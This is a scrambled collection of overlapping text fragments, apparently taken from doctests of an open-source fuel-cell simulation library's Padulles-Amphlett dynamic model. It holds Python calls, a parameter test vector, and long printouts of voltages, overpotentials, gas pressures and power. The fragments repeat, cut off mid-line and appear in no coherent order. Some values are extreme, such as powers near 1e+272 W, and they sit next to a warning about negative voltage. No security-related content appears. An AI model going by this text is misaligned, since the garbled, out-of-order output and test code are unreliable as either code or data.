5.992791140958347 W ########### I : 2.9 E : 6.068372423061707 V", "0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power", "Power-Thermal : 4.041762851824391 W ########### I : 2.1 E : 6.068384735676256 V Eta", "PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ###########", "4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"]", ": 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal :", "Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic :", "Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency :", "FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm", "0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss :", "True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258", "Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ... Warning : The value", ": 4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O :", "Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2", ": 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I", ": 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 :", "Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V", "Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5,", ": 7.774225509105296 W ########### I : 3.6 E : 6.068361646157063 V Eta Activation", "Power-Thermal : 7.003243683145644 W ########### I : 3.3 E : 6.0683662652154 V Eta", "atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W", "Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834", "PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E", "FC Power : 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877", "0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss :", "3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364", "Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V", "PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E", "V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm", "FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423", "Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046 V Eta", "Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2", "Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic :", "I : 1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta", "atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I : 3.3", "I : 0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta", "Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755", ": 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC", ": 4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O :", "Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model", ": 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss", "False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation", "E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration : 0.0006773165893020328", "V Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power :", "E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06", ": 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I", "PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I : 3.3 E", "Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V", "0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC", "E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247", "0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power", "0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073", ": 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC", "0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I :", "Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106", "PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ###########", "Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588", "FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm", "I : 3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta", "2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration :", "0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC", ": 4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O :", ": 4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O :", "2.432697510654893 W ########### I : 1.4 E : 6.06839550584913 V Eta Activation :", "W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974", "0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I :", "0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage", "FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149", "Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ###########", "Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O", "4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5,", "6.49540141236458 W ########### I : 3.1 E : 6.068369344266841 V Eta Activation :", "W ########### I : 2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025", "V Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power :", "FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475", "PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ###########", "V Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic", "PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ###########", "V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage :", ": 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal :", "11.591576336201861 W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2 :", ": 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC", "Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V", ": -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O :", "0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454", ": 3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543 V Eta Concentration", "0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893", "V Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power :", "Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W", ": 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V", ": 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC", "0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss :", "########### I : 1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V", "FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229", ": 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC", ": 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC", "PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ###########", "W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168", ": 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss", "FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324", "PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I : 2.5 E", ": -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2", "0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388", "0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage", "0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923 V Eta Activation :", "W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188", "0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147", ": 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC", "Power-Thermal : 6.748686546268298 W ########### I : 3.2 E : 6.068367804773196 V Eta", "0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is generating ... Done! >>>", "V Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm", "0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power", "0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132", "15.166791037577857 W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2 :", "Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165", "Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229", "FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429", ": 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V", "0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss :", "Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2", ": 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E :", "PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E", "V Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency", "PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ###########", "0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421", "V Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic", "FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm", ": 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC", "V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage :", "Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884", "V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency", "V Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency", "0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031", ": 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2", "0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power", "0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I :", "PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ###########", "W ########### I : 3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063", ": 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss", "FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368", ": 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 :", "Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2", "Power-Thermal : 7.516043371344917 W ########### I : 3.5 E : 6.068363185907339 V Eta", ": 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E :", "generating ... Warning : The value of I(>0.1) leads to minus amount of", ": 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss", ">>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error]", "0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I :", ": 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC", "Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V", "Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046", ": 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2", ": 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC", ">>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>>", "Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency :", "atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923 V", "3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326", "Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2", "Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561", "0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss :", ": 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V", ": 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E :", "Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359", "atm Power-Thermal : 2.432697510654893 W ########### I : 1.4 E : 6.06839550584913 V", "########### I : 2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V", "########### Analyzing . . . I : 0.1 E : 6.14455344314445 V Eta", "TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4,", "Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W", "3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration :", ": 4.279867176181073 W ########### I : 2.2 E : 6.068383196823811 V Eta Activation", ": 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2", ": 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC", "Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency :", "Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic :", "6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435 V Eta Activation :", "W ########### I : 0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763", "Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143", "FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm", "7.116048662715165 W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2 :", "FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm", ": 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I", "E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598", "Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269", "Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V", "0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage", "Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic :", ": 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC", "V Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic", ": 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V", "0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power", "E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06", ": 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 :", ">>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False", "FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654", "atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337 V", "atm Power-Thermal : 1.781480108817652 W ########### I : 1.1 E : 6.068400120676597 V", ": 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss", "6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta", "7.498786919530012 W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2 :", "7.003243683145644 W ########### I : 3.3 E : 6.0683662652154 V Eta Activation :", "0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184", "PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I : 3.5 E", "E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656", "0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power", "Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V", ": 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2", ": 3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration", ": 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2", "I : 0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta", "Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V", ": 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V", "Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V", "FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm", "########### I : 3.0 E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V", "0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power", ": 2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration", "Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704", "0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227", "########### I : 2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V", "7.259039668139408 W ########### I : 3.4 E : 6.06836472559345 V Eta Activation :", "V Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic", "0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I :", "Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic :", ": 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I", "6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta", "Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V", ": 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC", "14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 :", "Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729 V Eta", ": 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2", "4.761340157365757 W ########### I : 2.4 E : 6.068380118926627 V Eta Activation :", "FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269", "V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage :", "PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal", ": 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I", "PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal", ": 4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O :", "2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration :", "0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration :", ": 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I : 2.4 E :", ": 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V", "0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448", "Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2", "FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627", "PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal", ": 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC", "0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368", "0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727", "W ########### I : 3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208", "1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2 :", "Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V", "4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power", "Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V", "Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V", "########### I : 2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V", ": 4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O :", "V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage :", "Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O", "2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration :", ": 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V", "0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC", "V Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic", "W ########### I : 0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447", "Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O", "0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC", "1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration :", "2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration :", "Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V", ": 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss", "V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm", "V Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency", "coding: utf-8 -*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>>", "6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta", ": 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E :", ": 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 